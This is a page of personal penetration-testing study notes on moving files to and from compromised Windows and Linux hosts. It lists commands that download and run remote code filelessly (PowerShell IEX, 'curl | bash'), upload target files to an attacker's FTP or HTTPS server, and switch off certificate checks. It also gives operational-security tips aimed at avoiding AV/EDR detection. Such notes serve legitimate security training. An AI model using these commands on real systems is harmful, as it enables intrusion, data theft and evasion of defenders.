Noirchapeau's Gitbook
Noirchapeau
Noirchapeau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Overview
  • Common Challenges
  • Windows Transfer Techniques
  • PowerShell Methods
  • SMB Transfer
  • FTP Transfer
  • Living Off The Land (LOtL) Binaries
  • Linux Transfer Techniques
  • Base64 Transfer
  • Web Transfer Methods
  • SSH/SCP Transfer
  • Simple Web Server
  • Common Issues & Solutions
  • SSL/TLS Issues (Windows)
  • Port Considerations
  • Security Best Practices

File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

  • Host-based Controls

    • Application whitelisting

    • AV/EDR blocking

    • Process monitoring

  • Network Controls

    • Firewall restrictions

    • IDS/IPS monitoring

    • Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

  • WMIC

  • Bitsadmin

  • Certutil

  • Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Port Considerations

  • HTTP/HTTPS (80/443) - Usually allowed

  • SMB (445) - Often blocked

  • FTP (20/21) - May be filtered

  • SSH/SCP (22) - May require configuration

Security Best Practices

  1. Transfer Verification

    • Always verify file integrity (MD5/SHA)

    • Check file permissions after transfer

  2. Operational Security

    • Clean up temporary files

    • Remove credentials after use

    • Monitor for security alerts

    • Use encryption when possible

  3. Fileless Operations

    • Prefer memory-only operations

    • Clean up artifacts

    • Be aware of logging/monitoring

  4. Network Security

    • Use HTTPS/FTPS when available

    • Consider file size limitations

    • Monitor for AV/EDR alerts

PreviousOpenVAS (GVM) Vulnerability Scanner NotesNextAdvanced File Transfer Techniques